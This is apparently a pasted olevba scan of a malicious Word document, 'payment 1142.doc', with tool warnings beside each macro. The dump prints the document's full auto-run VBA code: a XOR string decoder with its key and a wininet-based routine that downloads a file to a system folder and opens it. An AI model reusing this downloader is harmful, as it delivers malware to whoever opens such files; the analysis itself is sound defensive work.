Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- payment 1142.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: payment 1142.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- HAZ82771
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '*3
- Public Const HAZ82774 = "1E1002035E597C29373725252A76591C1B01061203137D307B3C2A3A2A36545D120159170615352379607678262054"
- '*4
- Public Const HAZ82773 = "2507041A14023A2A317D023F2F3D620A0510131E2B1439213527"
- '*5
- Public Const HAZ82772 = "svdvsdvSDVSDVCX1"
- Sub HAZ82771()
- HONOOROA
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module11.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '* 1
- Public Const HAZ82776 = "250C131F08581234263F2D35222C581C18"
- '*2
- Public Const HAZ82775 = "2A17191F081D362A677D76787B76540B13"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' (File name: AddNewSheet.bas)
- ' Author: SENOO, Ken
- ' LICENSE: CC0
- ' (Last update: 2015-03-10T18:38+09:00)
- Sub AddNewSheet(sheet_name)
- ' csss
- For Each ws In Worksheets
- If ws.Name = sheet_name Then
- Application.DisplayAlerts = False
- ws.Delete
- Application.DisplayAlerts = True
- End If
- Next ws
- ' cscc
- Sheets.Add(After:=ActiveSheet).Name = sheet_name
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO UFO.frm
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/UFO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Private Const KAIIOOOO872 = 8162
- Private Const KAIIOOOO871 As String = "KAIIOOOO871"
- Private Const KAIIOOOO999 = 1
- Private Const cCCc = &H4000000
- Public Function SOLOMKA110(ByVal sURL As String, ByVal sFileName As String) As Boolean
- #If VBA7 And Win64 Then
- Dim HCDNNNDCNNDC2 As LongPtr, KAIIOOOO873 As LongPtr
- #Else
- Dim HCDNNNDCNNDC2 As Long, KAIIOOOO873 As Long
- #End If
- Dim CDSFDFD As Long
- Dim HCDNNNDCNNDC As String * KAIIOOOO872, KAIIOOOO874 As String
- Dim VVzzVz As Integer, dData As Double
- HCDNNNDCNNDC2 = SOLOMKA110222(KAIIOOOO871, KAIIOOOO999, vbNullString, vbNullString, 0)
- If HCDNNNDCNNDC2 = 0 Then
- Exit Function
- End If
- KAIIOOOO873 = SOLOMKA1102(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
- If KAIIOOOO873 = 0 Then
- dData = 0
- Else
- KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
- KAIIOOOO874 = HCDNNNDCNNDC
- Do While CDSFDFD <> 0
- KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
- Dim HhhhhHHuuU73772 As Integer
- For HhhhhHHuuU73772 = 0 To 0
- If HhhhhHHuuU73772 = 5 Then End
- Next HhhhhHHuuU73772
- KAIIOOOO874 = KAIIOOOO874 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
- Loop
- dData = Len(KAIIOOOO874): VVzzVz = FreeFile
- Open sFileName For Binary Access Write Lock Write As #VVzzVz
- Put #VVzzVz, , KAIIOOOO874: Close #VVzzVz
- End If
- SOLOMKA1102222 KAIIOOOO873
- SOLOMKA1102222 HCDNNNDCNNDC2
- KAIIOOOO874 = ""
- If dData Then
- SOLOMKA110 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module5.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub _
- HONOOROA()
- '* cASCAccaCACA
- Dim _
- HAZ82769
- Dim SiCoUnT As Integer
- Dim VgdgHH333jKKkllKAHNXNHHGDG87293 As Long
- For VgdgHH333jKKkllKAHNXNHHGDG87293 = 17 To 20
- SiCoUnT = VgdgHH333jKKkllKAHNXNHHGDG87293 + 1
- Next VgdgHH333jKKkllKAHNXNHHGDG87293
- Set HAZ82769 = CreateObject _
- (STOP7777777777 _
- (HAZ82772, HAZ82773))
- Dim HAZ82768
- Const HAZ82768ID = 2
- Dim JHAIICENAU019 As Integer
- For JHAIICENAU019 = 0 To 0
- If JHAIICENAU019 = 5 Then End
- Next JHAIICENAU019
- Set HAZ82768 = HAZ82769.GetSpecialFolder _
- (HAZ82768ID)
- Dim chdhai93 As Integer
- For chdhai93 = 0 To 0
- If chdhai93 = 5 Then End
- Next chdhai93
- HAZ82767 = HAZ82768 & STOP7777777777 _
- (HAZ82772, HAZ82775)
- Dim hiaopen847 As Integer
- For hiaopen847 = 0 To 0
- If hiaopen847 = 5 Then End
- Next hiaopen847
- Set HAZ82769 = CreateObject _
- (STOP7777777777 _
- (HAZ82772, HAZ82773))
- Dim BnBnHgs346 As Integer
- For BnBnHgs346 = 0 To 0
- If BnBnHgs346 = 5 Then End
- Next BnBnHgs346
- If HAZ82769.FileExists _
- (HAZ82767) Then
- HAZ82769. _
- DeleteFile HAZ82767
- End If
- If SOLOMKA110(STOP7777777777 _
- (HAZ82772, HAZ82774), HAZ82767) Then
- End If
- Set SSSS = Nothing
- If HAZ82769. _
- FileExists _
- (HAZ82767) Then
- End If
- Set SASASA = CreateObject _
- (STOP7777777777 _
- (HAZ82772, HAZ82776))
- SASASA.Open HAZ82767
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module6.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
- Dim asasas1 As Long
- Dim asasas1O As String
- Dim asasas10 As Integer
- Dim asasas101 As Integer
- For asasas1 = 1 To (Len(STOP77777777) / 2)
- asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
- asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
- asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
- Next asasas1
- STOP7777777777 = asasas1O
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement